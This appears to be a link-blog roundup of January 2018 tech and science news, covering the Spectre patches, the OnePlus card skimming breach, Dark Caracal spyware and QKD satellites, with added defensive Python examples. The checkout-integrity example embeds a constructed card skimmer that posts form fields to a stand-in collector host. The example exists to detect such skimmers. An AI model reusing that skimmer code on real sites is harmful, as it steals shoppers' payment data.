Intel patches for Spectre cause reboots; Intel tells people to stop installing them, and also asks partners to help test the fix

As we start the week, I want to provide an update on the reboot issues we reported Jan. 11. We have now identified the root cause for Broadwell and Haswell platforms, and made good progress in developing a solution to address it. Over the weekend, we began rolling out an early version of the updated solution to industry partners for testing, and we will make a final release available once that testing has been completed.

Based on this, we are updating our guidance for customers and partners:

We recommend that OEMs, cloud service providers, system manufacturers, software vendors and end users stop deployment of current versions, as they may introduce higher than expected reboots and other unpredictable system behavior. For the full list of platforms, see the Intel.com Security Center site.
We ask that our industry partners focus efforts on testing early versions of the updated solution so we can accelerate its release. We expect to share more details on timing later this week.
We continue to urge all customers to vigilantly maintain security best practice and for consumers to keep systems up-to-date.

Source: Root Cause of Reboot Issue Identified; Updated Guidance for Customers and Partners

Amazon.com: Dr.meter Wifi Endoscope, 2.0 Megapixels HD Digital Inspection Camera with 5 Meters(16.4ft) Cable and 8 LEDs in the Camera Handheld Borescope Supports Windows iOS and Android System: Camera & Photo

Source: Amazon.com: Dr.meter Wifi Endoscope, 2.0 Megapixels HD Digital Inspection Camera with 5 Meters(16.4ft) Cable and 8 LEDs in the Camera Handheld Borescope Supports Windows iOS and Android System: Camera & Photo

Revealing True Emotions Through Micro-Expressions: A Machine Learning Approach

Micro-expressions–involuntary, fleeting facial movements that reveal true emotions–hold valuable information for scenarios ranging from security interviews and interrogations to media analysis. They occur on various regions of the face, last only a fraction of a second, and are universal across cultures. In contrast to macro-expressions like big smiles and frowns, micro-expressions are extremely subtle and nearly impossible to suppress or fake. Because micro-expressions can reveal emotions people may be trying to hide, recognizing micro-expressions can aid DoD forensics and intelligence mission capabilities by providing clues to predict and intercept dangerous situations. This blog post, the latest highlighting research from the SEI Emerging Technology Center in machine emotional intelligence, describes our work on developing a prototype software tool to recognize micro-expressions in near real-time.

Source: Revealing True Emotions Through Micro-Expressions: A Machine Learning Approach

Facebook open sources Detectron, object detection framework in caffe2

Today, Facebook AI Research (FAIR) open sourced Detectron — our state-of-the-art platform for object detection research.

The Detectron project was started in July 2016 with the goal of creating a fast and flexible object detection system built on Caffe2, which was then in early alpha development. Over the last year and a half, the codebase has matured and supported a large number of our projects, including Mask R-CNN and Focal Loss for Dense Object Detection, which won the Marr Prize and Best Student Paper awards, respectively, at ICCV 2017. These algorithms, powered by Detectron, provide intuitive models for important computer vision tasks, such as instance segmentation, and have played a key role in the unprecedented advancement of visual perception systems that our community has achieved in recent years.

Source: Facebook open sources Detectron – Facebook Research

Active learning machine learns to create new quantum experiments

We present an autonomous learning model which learns to design such complex experiments, without relying on previous knowledge or often flawed intuition. Our system not only learns how to design desired experiments more efficiently than the best previous approaches, but in the process also discovers nontrivial experimental techniques. Our work demonstrates that learning machines can offer dramatic advances in how experiments are generated.
[…]
The artificial intelligence system learns to create a variety of entangled states and improves the efficiency of their realization. In the process, the system autonomously (re)discovers experimental techniques which are only now becoming standard in modern quantum optical experiments—a trait which was not explicitly demanded from the system but emerged through the process of learning. Such features highlight the possibility that machines could have a significantly more creative role in future research.

Source: Active learning machine learns to create new quantum experiments

The artificial agent develops new experiments by virtually placing mirrors, prisms or beam splitters on a virtual lab table. If its actions lead to a meaningful result, the agent has a higher chance of finding a similar sequence of actions in the future. This is known as a reinforcement learning strategy.

Read more at: https://phys.org/news/2018-01-artificial-agent-quantum.html#jCp

Breakthrough study shows how plants sense the world

Plants lack eyes and ears, but they can still see, hear, smell and respond to environmental cues and dangers—especially to virulent pathogens. They do this with the aid of hundreds of membrane proteins that can sense microbes or other stresses.

Only a small portion of these sensing proteins have been studied through classical genetics, and knowledge on how these sensors function by forming complexes with one another is scarce. Now, an international team of researchers from four nations—including Shahid Mukhtar, Ph.D., and graduate student Timothy “TC” Howton at the University of Alabama at Birmingham—has created the first network map for 200 of these proteins. The map shows how a few key proteins act as master nodes critical for network integrity, and the map also reveals unknown interactions.
[…]
The model plant Arabidopsis thaliana contains more than 600 different receptor kinases—50 times more than humans—that are critical for plant growth, development, immunity and stress response. Until now, only a handful had known functions, and little was known about how the receptors might interact with each other to coordinate responses to often-conflicting signals.

For the Nature study, the Belkhadir lab tested interactions between extracellular domains of the receptors in a pairwise manner, working with more than 400 extracellular domains of the LRR-receptor kinases and performing 40,000 interaction tests.

Positive interactions were used to produce an interaction map displaying how those receptor kinases interact with one another, in a total of 567 high-confidence interactions.
[…]
At UAB, Mukhtar and Howton tested 372 intracellular domains of the LRR-receptor kinases whose extracellular domains had shown high-confidence interactions, to see if the intracellular domains also showed strong interactions. More than half did, suggesting that the formation of these receptor complexes is required for signal perception and downstream signal transduction. This also indicates a validation of the biological significance of the extracellular domain interaction.
[…]
The Nature study included two major surprises, says Adam Mott, Ph.D., University of Toronto. LRR-receptor kinases that have small extracellular domains interacted with other LRR-receptor kinases more often than those that have large domains. This suggests that the small receptor kinases evolved to coordinate actions of the other receptors. Second, researchers identified several unknown LRR-receptor kinases that appear critical for network integrity.

Source: Breakthrough study shows how plants sense the world

So yes, vegetarians, plants do live and feel and see and detect, you murderers!

American Reich restarts dodgy spying program – just as classified surveillance abuse memo emerges

The US Senate reauthorized a controversial NSA spying program on Thursday – and then, because it’s 2018 and nothing matters any more, embarked on a partisan battle over a confidential memo that outlines Uncle Sam’s alleged abuse of surveillance powers.

Despite numerous appeals, press conferences, competing legislation and speeches outlining abuse of the program, on Thursday a majority of senators ignored pleas for a proper warrant requirement to be added to the program – that would require the Feds to always go to a judge before searching the communications of a US citizen – and voted to continue the surveillance for a further six years.
[…]

However, the agents won’t need a warrant if they are looking into…

Death, kidnapping, serious bodily injury, offense against a minor, destruction of critical infrastructure, cybersecurity, transnational crime, and human trafficking

…which are basically the crimes the FBI investigates. Ergo, it’s unlikely the Feds will seek warrants to search the NSA’s section 702 data stores for stuff on American citizens.

Just hours after the section 702 program was given the final green light before the president can sign on the dotted line, the Senate’s intelligence committee approved the release of a confidential four-page memo alleging previous abuse of the FISA spying program to the rest of Congress. The public is unable to see it.

The mysterious missive was drafted by House intelligence committee chairman Devin Nunes (R-CA), and of course it could be looney-tunes nonsense. Regardless, a number of lawmakers who only now just read the memo have said that had they been aware of the misconduct detailed in the memo, they would not have voted for the reauthorization of section 702 of the FISA Amendments Act.

Republican lawmakers in particular, having seen the report, embarked on a fiercely partisan campaign accusing the Obama administration of snooping on the Trump presidential campaign using the foreigner-targeting FISA laws.
[…]
The hypocrisy is stunning, even for Congress. One moment, Republicans insist a Big Brother program is needed to foil terrorists abroad, ignoring its ability to pry into the lives of Americans. The next moment, Republicans are upset the same set of laws were indeed used to pry into the lives of Americans – some of the folks working for Team Trump.
[…]
Congresscriters who now claim to be shocked – shocked! – about FISA’s sweeping capabilities have been willfully ignoring determined efforts in both the House and the Senate in recent weeks to have a full debate about the extent of spying powers that the US government possesses.
[…]

In one part of that speech, he even went into great detail over how the Director of National Intelligence had publicly denied that Uncle Sam was able to intercept communications between US citizens on US soil – and then, when challenged subsequently, claimed to have heard a different question.

When Wyden asked the same question again, the director refused to answer, claiming that it was classified. “How can a topic in which the director of national intelligence has already given an answer in public suddenly become classified?” asked Wyden in his speech.

But if all that wasn’t enough, we will all likely be subject to one more head-holding display of hypocrisy when President Trump signs the reauthorization bill into law – despite the fact congressfolk are railing against the same set of FISA laws being used to spy on his campaign.

Source: America restarts dodgy spying program – just as classified surveillance abuse memo emerges • The Register

Security Breaches Don’t Affect Stock Price. Or don’t they?

Abstract: This report assesses the impact disclosure of data breaches has on the total returns and volatility of the affected companies’ stock, with a focus on the results relative to the performance of the firms’ peer industries, as represented through selected indices rather than the market as a whole. Financial performance is considered over a range of dates from 3 days post-breach through 6 months post-breach, in order to provide a longer-term perspective on the impact of the breach announcement.

Key findings:

While the difference in stock price between the sampled breached companies and their peers was negative (1.13%) in the first 3 days following announcement of a breach, by the 14th day the return difference had rebounded to + 0.05%, and on average remained positive through the period assessed.

For the differences in the breached companies’ betas and the beta of their peer sets, the differences in the means of 8 months pre-breach versus post-breach was not meaningful at 90, 180, and 360 day post-breach periods.

For the differences in the breached companies’ beta correlations against the peer indices pre- and post-breach, the difference in the means of the rolling 60 day correlation 8 months pre- breach versus post-breach was not meaningful at 90, 180, and 360 day post-breach periods.

In regression analysis, use of the number of accessed records, date, data sensitivity, and malicious versus accidental leak as variables failed to yield an R² greater than 16.15% for response variables of 3, 14, 60, and 90 day return differential, excess beta differential, and rolling beta correlation differential, indicating that the financial impact on breached companies was highly idiosyncratic.

Based on returns, the most impacted industries at the 3 day post-breach date were U.S. Financial Services, Transportation, and Global Telecom. At the 90 day post-breach date, the three most impacted industries were U.S. Financial Services, U.S. Healthcare, and Global Telecom.

The market isn’t going to fix this. If we want better security, we need to regulate the market.

Source: Security Breaches Don’t Affect Stock Price – Schneier on Security

However, the dataset:

The analysis began with a dataset of 235 recorded data breaches dating back to 2005

is very small and misses some of the huge breaches such as Equifax.
There is also a very telling table in the results showing that if a breach is hugely public, then share prices do indeed plummet.

So it may also have something to do with how the company handles the breach and how much media attention is out there.

OnePlus say 40,000 customers credit card details breached

1. What happened

One of our systems was attacked, and a malicious script was injected into the payment page code to sniff out credit card info while it was being entered. The malicious script operated intermittently, capturing and sending data directly from the user's browser. It has since been eliminated. We have quarantined the infected server and reinforced all relevant system structures.

2. Who's affected

Some users who entered their credit card info on oneplus.net between mid-November 2017 and January 11, 2018, may be affected. Credit card info (card numbers, expiry dates and security codes) entered at oneplus.net during this period may be compromised.

Users who paid via a saved credit card should NOT be affected.
Users who paid via the "Credit Card via PayPal" method should NOT be affected.
Users who paid via PayPal should NOT be affected.

We have contacted potentially affected users via email.

Source: [Jan 19 Update] An Update on Credit Card Security – OnePlus Forums
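The OnePlus description is the classic payment-page skimmer: script injected into the checkout page reads the card fields in the visitor's browser and posts them to a host the shop does not control, so server-side logs of the payment flow look normal. A cheap external check is to snapshot the checkout page from the outside and compare every script on it with a recorded baseline. The following is an added example written for this post, not OnePlus code; the page markup, the shop and collector hostnames and the allowlist are all constructed for the illustration.

```python
"""Integrity audit for the scripts on a checkout page.

Added example (not OnePlus code). A monitoring job hashes every inline
<script> body and records every external script host on a snapshot known to
be clean; later snapshots are compared with that baseline. An injected
skimmer shows up as an inline script whose hash is not in the baseline, or
as a script loaded from a host that is not on the allowlist.
All page contents and hostnames are constructed for the example.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

PAGE_URL = "https://shop.example.test/checkout"                    # hypothetical
ALLOWED_SCRIPT_HOSTS = {"shop.example.test", "cdn.example.test"}  # hypothetical

# Known-good snapshot of the payment page (constructed).
KNOWN_GOOD_PAGE = """<html><body>
<form id="payment">
  <input name="cc-number"><input name="cc-exp"><input name="cc-csc">
</form>
<script src="https://cdn.example.test/checkout.js"></script>
<script src="/static/form.js"></script>
<script>
  document.getElementById("payment").addEventListener("submit", tokenizeCard);
</script>
</body></html>"""

# Later snapshot with a skimmer injected (constructed): it reads the card
# fields as they are filled in and posts them to a third-party host.
COMPROMISED_PAGE = KNOWN_GOOD_PAGE.replace("</body>", """<script>
  document.querySelectorAll("input[name^='cc-']").forEach(function (field) {
    field.addEventListener("change", function () {
      fetch("https://stats.collector.test/c", {method: "POST",
            body: field.name + "=" + field.value});
    });
  });
</script>
<script src="https://stats.collector.test/loader.js"></script>
</body>""")


class _ScriptCollector(HTMLParser):
    """Collects (src, inline_body) for every <script> element on a page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._body = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._body = []

    def handle_data(self, data):
        if self._in_script:
            self._body.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._body)))
            self._in_script = False


def collect_scripts(html):
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def inline_hash(body):
    # Only leading/trailing whitespace is ignored; any edit inside the script changes the hash.
    return hashlib.sha256(body.strip().encode("utf-8")).hexdigest()


def baseline_inline_hashes(html):
    """Record the hashes of the inline scripts of a page known to be clean."""
    return {inline_hash(body) for src, body in collect_scripts(html) if src is None}


def audit_page(html, allowed_inline_hashes, allowed_hosts, page_url=PAGE_URL):
    """Return (finding, detail) pairs for scripts that deviate from the baseline."""
    findings = []
    for src, body in collect_scripts(html):
        if src is not None:
            # Relative src values resolve to the page's own origin.
            host = urlparse(urljoin(page_url, src)).hostname or ""
            if host not in allowed_hosts:
                findings.append(("unexpected-external-script", src))
        else:
            digest = inline_hash(body)
            if digest not in allowed_inline_hashes:
                findings.append(("unexpected-inline-script", digest))
    return findings


if __name__ == "__main__":
    baseline = baseline_inline_hashes(KNOWN_GOOD_PAGE)
    print("clean page:", audit_page(KNOWN_GOOD_PAGE, baseline, ALLOWED_SCRIPT_HOSTS))
    for finding in audit_page(COMPROMISED_PAGE, baseline, ALLOWED_SCRIPT_HOSTS):
        print("ALERT", *finding)
```

The baseline has to be regenerated on every legitimate deployment of the checkout page, otherwise the job trains operators to ignore alerts. The in-browser complements are a Content-Security-Policy that restricts script sources and connect targets, and Subresource Integrity hashes on the external scripts, which make the same comparison at load time instead of after the fact.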

Real-world intercontinental quantum communications enabled by the Micius satellite

A joint China-Austria team has performed quantum key distribution between the quantum-science satellite Micius and multiple ground stations located in Xinglong (near Beijing), Nanshan (near Urumqi), and Graz (near Vienna). Such experiments demonstrate the secure satellite-to-ground exchange of cryptographic keys during the passage of the satellite Micius over a ground station. Using Micius as a trusted relay, a secret key was created between China and Europe at locations separated up to 7,600 km on the Earth.
[…]
Within a year after launch, three key milestones for a global-scale quantum internet were achieved: satellite-to-ground decoy-state QKD with kHz rate over a distance of ~1200 km (Liao et al. 2017, Nature 549, 43); satellite-based entanglement distribution to two locations on the Earth separated by ~1200 km and Bell test (Yin et al. 2017, Science 356, 1140), and ground-to-satellite quantum teleportation (Ren et al. 2017, Nature 549, 70). The effective link efficiencies in the satellite-based QKD were measured to be ~20 orders of magnitude larger than direct transmission through optical fibers at the same length of 1200 km. The three experiments are the first steps toward a global space-based quantum internet.

The satellite-based QKD has now been combined with metropolitan quantum networks, in which fibers are used to efficiently and conveniently connect numerous users inside a city over a distance scale of ~100 km. For example, the Xinglong station has now been connected to the metropolitan multi-node quantum network in Beijing via optical fibers. Very recently, the largest fiber-based quantum communication backbone has been built in China, also by Professor Pan’s team, linking Beijing to Shanghai (going through Jinan and Hefei, and 32 trustful relays) with a fiber length of 2000 km. The backbone is being tested for real-world applications by government, banks, securities and insurance companies.

Read more at: https://phys.org/news/2018-01-real-world-intercontinental-quantum-enabled-micius.html#jCp

Source: Real-world intercontinental quantum communications enabled by the Micius satellite
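"Using Micius as a trusted relay" and "32 trustful relays" on the Beijing-Shanghai backbone are doing a lot of work in the passage above. Each QKD link only gives the two ends of that link a shared key; to get a key between Beijing and Vienna, every intermediate node XORs the keys of its two links and publishes the result, and the far end unwinds the chain. The example below is added for this post and is not the Micius team's code; the QKD sessions themselves are replaced by a stand-in that hands both ends of a link the same random bytes (os.urandom), which is an assumption, so only the relay arithmetic is real. It generalizes to a chain of any length and shows the caveat that matters: every relay can reconstruct the end-to-end key, a passive listener on the classical channel cannot.

```python
"""Trusted-relay key distribution over a chain of QKD links.

Added example, not the Micius team's code. The QKD links are modelled as a
black box that gives both ends of a link the same random key (os.urandom
stands in for the physical layer; assumption). Node 0 is Alice, the last node
is Bob, the nodes in between are relays. Relay i holds the keys of links i-1
and i and publishes their XOR over an authenticated classical channel.
"""
import os
from functools import reduce


def xor_bytes(a, b):
    if len(a) != len(b):
        raise ValueError("key lengths differ")
    return bytes(x ^ y for x, y in zip(a, b))


def qkd_link_key(length):
    """Stand-in for one successful QKD session on one link (assumption)."""
    return os.urandom(length)


def relay_broadcasts(link_keys):
    """Broadcast j is published by relay j+1: k_j XOR k_{j+1}."""
    return [xor_bytes(link_keys[i - 1], link_keys[i]) for i in range(1, len(link_keys))]


def key_at_bob(bob_link_key, broadcasts):
    """k_last XOR (k_0^k_1) XOR (k_1^k_2) XOR ... collapses to k_0, Alice's link key."""
    return reduce(xor_bytes, broadcasts, bob_link_key)


def key_at_relay(i, link_keys, broadcasts):
    """Relay i needs only its Alice-side link key and the broadcasts upstream of it."""
    return reduce(xor_bytes, broadcasts[: i - 1], link_keys[i - 1])


def key_at_eavesdropper(broadcasts):
    """All a passive listener can compute: k_0 XOR k_last, which decrypts nothing."""
    return reduce(xor_bytes, broadcasts)


def one_time_pad(data, key):
    return xor_bytes(data, key)


def demo(n_relays=32, key_len=16):
    """Returns (every relay knows the end-to-end key, eavesdropper knows it)."""
    link_keys = [qkd_link_key(key_len) for _ in range(n_relays + 1)]
    broadcasts = relay_broadcasts(link_keys)
    alice_key = link_keys[0]
    bob_key = key_at_bob(link_keys[-1], broadcasts)
    msg = b"wire transfer ok"  # constructed; 16 bytes to match key_len
    if one_time_pad(one_time_pad(msg, alice_key), bob_key) != msg:
        raise RuntimeError("end-to-end key mismatch")
    relays_know = all(key_at_relay(i, link_keys, broadcasts) == alice_key
                      for i in range(1, n_relays + 1))
    listener_knows = key_at_eavesdropper(broadcasts) == alice_key
    return relays_know, listener_knows


if __name__ == "__main__":
    print("relays hold the key: %s, listener holds the key: %s" % demo())
```

The design point: QKD removes the need to trust the fibre or the free-space link, but a trusted-relay network moves that trust onto every relay node, which must be physically secured like a key-management appliance. The quoted ~20 orders of magnitude link-efficiency gain and the satellite's role both exist to shorten the chain of nodes that have to be trusted this way.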

Information engine operates with nearly perfect efficiency

Physicists have experimentally demonstrated an information engine—a device that converts information into work—with an efficiency that exceeds the conventional second law of thermodynamics. Instead, the engine’s efficiency is bounded by a recently proposed generalized second law of thermodynamics, and it is the first information engine to approach this new bound.

The results demonstrate both the feasibility of realizing a “lossless” information engine—so-called because virtually none of the available information is lost but is instead almost entirely converted into work—and also experimentally validates the sharpness of the bound set by the generalized second law.

The physicists, Govind Paneru, Dong Yun Lee, Tsvi Tlusty, and Hyuk Kyu Pak at the Institute for Basic Science in Ulsan, South Korea (Tlusty and Pak are also with the Ulsan National Institute of Science and Technology), have published a paper on the lossless information engine in a recent issue of Physical Review Letters.

[…]
Traditionally, the maximum efficiency with which an engine can convert energy into work is bounded by the second law of thermodynamics. In the past decade, however, experiments have shown that an engine’s efficiency can surpass the second law if the engine can gain information from its surroundings, since it can then convert that information into work. These information engines (or “Maxwell’s demons,” named after the first conception of such a device) are made possible due to a fundamental connection between information and thermodynamics that scientists are still trying to fully understand.

Read more at: https://phys.org/news/2018-01-efficiency.html#jCp

Source: Information engine operates with nearly perfect efficiency

You could soon be manufacturing your own drugs—thanks to 3D printing

Forget those long lines at the pharmacy: Someday soon, you might be making your own medicines at home. That’s because researchers have tailored a 3D printer to synthesize pharmaceuticals and other chemicals from simple, widely available starting compounds fed into a series of water bottle–size reactors. The work, they say, could digitize chemistry, allowing users to synthesize almost any compound anywhere in the world.
[…]
In today’s issue of Science, Cronin and his colleagues report printing a series of interconnected reaction vessels that carry out four different chemical reactions involving 12 separate steps, from filtering to evaporating different solutions. By adding different reagents and solvents at the right times and in a precise order, they were able to convert simple, widely available starting compounds into a muscle relaxant called baclofen. And by designing reactionware to carry out different chemical reactions with different reagents, they produced other medicines, including an anticonvulsant and a drug to fight ulcers and acid reflux.

Source: You could soon be manufacturing your own drugs—thanks to 3D printing | Science | AAAS

Why People Dislike Really Smart Leaders

Intelligence makes for better leaders—from undergraduates to executives to presidents—according to multiple studies. It certainly makes sense that handling a market shift or legislative logjam requires cognitive oomph. But new research on leadership suggests that, at a certain point, having a higher IQ stops helping and starts hurting.
[…]
The researchers looked at 379 male and female business leaders in 30 countries, across fields that included banking, retail and technology. The managers took IQ tests (an imperfect but robust predictor of performance in many areas), and each was rated on leadership style and effectiveness by an average of eight co-workers. IQ positively correlated with ratings of leader effectiveness, strategy formation, vision and several other characteristics—up to a point. The ratings peaked at an IQ of around 120, which is higher than roughly 80 percent of office workers. Beyond that, the ratings declined. The researchers suggest the “ideal” IQ could be higher or lower in various fields, depending on whether technical versus social skills are more valued in a given work culture.

“It’s an interesting and thoughtful paper,” says Paul Sackett, a management professor at University of Minnesota, who was not involved in the research. “To me, the right interpretation of the work would be that it highlights a need to understand what high-IQ leaders do that leads to lower perceptions by followers,” he says. “The wrong interpretation would be, ‘Don’t hire high-IQ leaders.’ ”

Source: Why People Dislike Really Smart Leaders – Scientific American

Someone is touting a mobile, PC spyware platform called Dark Caracal to governments

Dark Caracal [PDF] appears to be controlled from the Lebanon General Directorate of General Security in Beirut – an intelligence agency – and has slurped hundreds of gigabytes of information from devices. It shares its backend infrastructure with another state-sponsored surveillance campaign, Operation Manul, which the EFF claims was operated by the Kazakhstan government last year.

Crucially, it appears someone is renting out the Dark Caracal spyware platform to nation-state snoops.

“This is definitely one group using the same infrastructure,” Eva Galperin, the EFF’s director of cybersecurity, told The Register on Wednesday. “We think there’s a third party selling this to governments.”

Dark Caracal has, we’re told, been used to siphon off information from thousands of targets in over 21 countries – from private documents, call records, audio recordings, and text messages to contact information, and photos from military, government, and business targets, as well as activists and journalists.
[…]
The primary way to pick up Pallas on your gadget is by installing infected applications – such as WhatsApp and Signal ripoffs – from non-official software souks. Pallas doesn’t exploit zero-days to take over a device, but instead relies on users being tricked into installing booby-trapped apps, and granting the malicious software a large variety of permissions. Once in place, it can thus surreptitiously record audio from the phone’s microphone, reveal the gizmo’s location to snoops, and leak all the data the handset contains to its masters.

In addition, the Dark Caracal platform offers another surveillance tool: a previously unseen sample of FinFisher, the spyware package sold to governments to surveil citizens. It’s not known if this was legitimately purchased, or a demo version that was adapted.

On the desktop side, Dark Caracal provides a Delphi-coded Bandook trojan, previously identified in Operation Manul, that commandeers Windows systems. Essentially, marks are tricked into installing and running infected programs signed with a legitimate security certificate. Once up and running, the software nasty downloads more malware from command-and-control servers. The code pest can also be stashed in Microsoft Word documents, and executed using macros – so beware, Office admins.

Source: Someone is touting a mobile, PC spyware platform called Dark Caracal to governments • The Register
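"The code pest can also be stashed in Microsoft Word documents, and executed using macros" is the part Office admins can actually act on at the mail gateway, since no exploit is involved and the macro project is a plain part inside the file. The following is an added example written for this post, not tooling from the EFF or Lookout report: in the OOXML formats (.docm, .xlsm, .pptm) the document is a zip archive, a VBA project is stored as a vbaProject.bin part, and the [Content_Types].xml manifest declares it with the vbaProject content type. The two sample documents are built in memory and are constructed stand-ins, not real files.

```python
"""Triage of Office documents for an embedded VBA macro project.

Added example, not from the Dark Caracal report. OOXML documents are zip
archives; a macro project lives in a vbaProject.bin part and is declared in
[Content_Types].xml with content type application/vnd.ms-office.vbaProject.
Legacy OLE2 .doc/.xls files are not zips and are reported as unsupported.
Sample documents below are constructed in memory.
"""
import io
import zipfile

VBA_PART_SUFFIX = "vbaproject.bin"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


def classify(doc_bytes):
    """Return ('macros' | 'clean' | 'unsupported', [reasons]) without launching Office."""
    try:
        with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
            names = zf.namelist()
            manifest = ""
            if "[Content_Types].xml" in names:
                manifest = zf.read("[Content_Types].xml").decode("utf-8", "replace")
    except zipfile.BadZipFile:
        return "unsupported", ["not an OOXML zip (legacy OLE2 .doc needs an OLE parser)"]
    reasons = [f"part {n}" for n in names if n.lower().endswith(VBA_PART_SUFFIX)]
    if VBA_CONTENT_TYPE in manifest:
        reasons.append("manifest declares the vbaProject content type")
    return ("macros" if reasons else "clean"), reasons


def build_sample_docx(with_macros):
    """Constructed minimal Word archive (real files carry many more parts)."""
    main_type = ("application/vnd.ms-word.document.macroEnabled.main+xml" if with_macros
                 else "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")
    types = ['<?xml version="1.0" encoding="UTF-8"?>',
             '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">',
             f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>']
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if with_macros:
            types.append(f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>')
            # Real vbaProject.bin is an OLE2 container; only its magic bytes are reproduced here.
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8)
        types.append("</Types>")
        zf.writestr("[Content_Types].xml", "".join(types))
        zf.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("macro doc", build_sample_docx(True)),
                       ("plain doc", build_sample_docx(False)),
                       ("ole2 blob", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8)):
        print(label, classify(doc))
```

Presence of a macro project is a triage signal, not a verdict; the next step is to extract and read the VBA (the report notes the trojan is also delivered as signed executables, which this check will never see). For the legacy binary formats an OLE parser such as olefile is needed instead of zipfile.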

New AI System Predicts How Long Patients Will Live With Startling Accuracy

By using an artificially intelligent algorithm to predict patient mortality, a research team from Stanford University is hoping to improve the timing of end-of-life care for critically ill patients.

After parsing through 2 million records, the researchers identified 200,000 patients suitable for the project. The researchers were “agnostic” to disease type, disease stage, severity of admission (ICU versus non-ICU), and so on. All of these patients had associated case reports, including a diagnosis, the number of scans ordered, the types of procedures performed, the number of days spent in the hospital, medicines used, and other factors.

The deep learning algorithm studied the case reports from 160,000 of these patients, and was given the directive: “Given a patient and a date, predict the mortality of that patient within 12 months from that date, using EHR data of that patient from the prior year.” The system was trained to predict patient mortality within the next three to 12 months. Patients with less than three months of lifespan weren’t considered, as that would leave insufficient time for palliative care preparations.

Armed with its new skills, the algorithm was tasked with assessing the remaining 40,000 patients. It did quite well, successfully predicting patient mortality within the 3 to 12 month timespan in nine out of 10 cases. Around 95 percent of patients who were assessed with a low probability of dying within that period lived beyond 12 months. The pilot study proved successful, and the researchers are now hoping their system will be applied more broadly.

Source: New AI System Predicts How Long Patients Will Live With Startling Accuracy

The Man from Earth Sequel ‘Pirated’ on The Pirate Bay – By Its Creators

More than a decade ago, Hollywood was struggling to get to grips with the file-sharing phenomenon. Sharing via BitTorrent was painted as a disease that could kill the movie industry, if it was allowed to take hold. Tough action was the only way to defeat it, the suits concluded.

In 2007, however, a most unusual turn of events showed that piracy could have a magical effect on the success of a movie.

After being produced on a tiny budget, a then little-known independent sci-fi film called “The Man from Earth” turned up on pirate sites, to the surprise of its creators.
[…]
“A week or two before the DVD’s ‘street date’, we jumped 11,000% on the IMDb ‘Moviemeter’ and we were shocked.”

With pirates fueling interest in the movie, a member of the team took an unusual step. Producer Eric Wilkinson wrote to RLSlog, a popular piracy links site – not to berate pirates – but to thank them for catapulting the movie to fame.

“Our independent movie had next to no advertising budget and very little going for it until somebody ripped one of the DVD screeners and put the movie online for all to download. Most of the feedback from everyone who has downloaded ‘The Man From Earth’ has been overwhelmingly positive. People like our movie and are talking about it, all thanks to piracy on the net!” he wrote.
[…]
“Once we realized what was going on, we asked people to make donations to our PayPal page if they saw the movie for free and liked it, because we had all worked for nothing for two years to bring it to the screen, and the only chance we had of surviving financially was to ask people to support us and the project,” Schenkman explains.

“And, happily, many people around the world did donate, although of course only a tiny fraction of the millions and millions of people who downloaded pirated copies.”

Following this early boost The Man from Earth went on to win multiple awards. And, a decade on, it boasts a hugely commendable 8/10 score on IMDb from more than 147,000 voters, with Netflix users leaving over 650,000 ratings, which reportedly translates to well over a million views.
[…]
Yesterday the team behind the movie took matters into their own hands, uploading the movie to The Pirate Bay and other sites so that fans can help themselves.

“It was going to get uploaded regardless of what we did or didn’t do, and we figured that as long as this was inevitable, we would do the uploading ourselves and explain why we were doing it,” Schenkman informs TF.

“And, we would once again reach out to the filesharing community and remind them that while movies may be free to watch, they are not free to make, and we need their support.”

The release, listed here on The Pirate Bay, comes with detailed notes and a few friendly pointers on how the release can be further shared. It also informs people how they can show their appreciation if they like it.

Source: The Man from Earth Sequel ‘Pirated’ on The Pirate Bay – By Its Creators – TorrentFreak

And this is how you make money in the digital age!

Crypto-cash exchange BitConnect pulls plug amid Bitcoin bloodbath

Amid a cryptocurrency price correction that has seen the price of Bitcoin drop by half from its mid-December peak, UK-based cyber-cash lending and exchange biz BitConnect said it is shutting down.

The firm, dogged by accusations that it is a Ponzi scheme, cited bad press, regulatory orders, and cyber attacks for its market exit this week.

BitConnect said it has received two cease-and-desist letters from US financial watchdogs: one from the Texas State Securities Board, and one from the Securities Division of North Carolina’s Secretary of State.

The letter from Texas authorities, an emergency cease-and-desist order sent January 3, 2018, charges the company with fraud and misleading investors.

The letter from North Carolina authorities observes that BitConnect’s purported rate of return amounts to about 3,000 per cent annually.

Noting that such rates “are extremely unusual in financial markets,” the North Carolina letter stated: “Guaranteed annual compounded investment returns of over 3,000 per cent are a known ‘red-flag’ for fraud, specifically for the risk that the investment may be a ‘Ponzi scheme.'”

Source: Crypto-cash exchange BitConnect pulls plug amid Bitcoin bloodbath • The Register

Computer program that tries to determine if you will reoffend is racist, wrong and has been in use since 2000.

One widely used criminal risk assessment tool, Correctional Offender Management Profiling for Alternative Sanctions (COMPAS; Northpointe, which rebranded itself to “equivant” in January 2017), has been used to assess more than 1 million offenders since it was developed in 1998. The recidivism prediction component of COMPAS—the recidivism risk scale—has been in use since 2000. This software predicts a defendant’s risk of committing a misdemeanor or felony within 2 years of assessment from 137 features about an individual and the individual’s past criminal record.

